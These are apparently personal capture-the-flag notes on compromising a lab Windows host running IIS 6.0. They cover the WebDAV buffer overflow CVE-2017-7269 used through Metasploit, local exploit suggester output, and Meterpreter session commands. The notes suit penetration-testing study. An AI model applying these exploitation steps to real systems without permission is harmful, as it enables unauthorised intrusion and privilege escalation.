#####################
# Sources and Links #
#####################
# Meterpreter cheat sheet
https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf

#########
# TL,DR #
#########

########
# Hack #
########
Nmap shows port 80 open, the web page mentions IIS
IIS version 6.0

There's a possible attack: Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow. CVE-2017-7269
A metasploit module gives us a shell. Access to user Lakis is denied.


run post/multi/recon/local_exploit_suggester

[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 29 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.

##########
# Learned #
###########
Background a meterpreter shell with Ctrl-z
Show sessions with sessions -l
Interact with a session with session -i [SessionID]
post/multi/recon/local_exploit_suggester
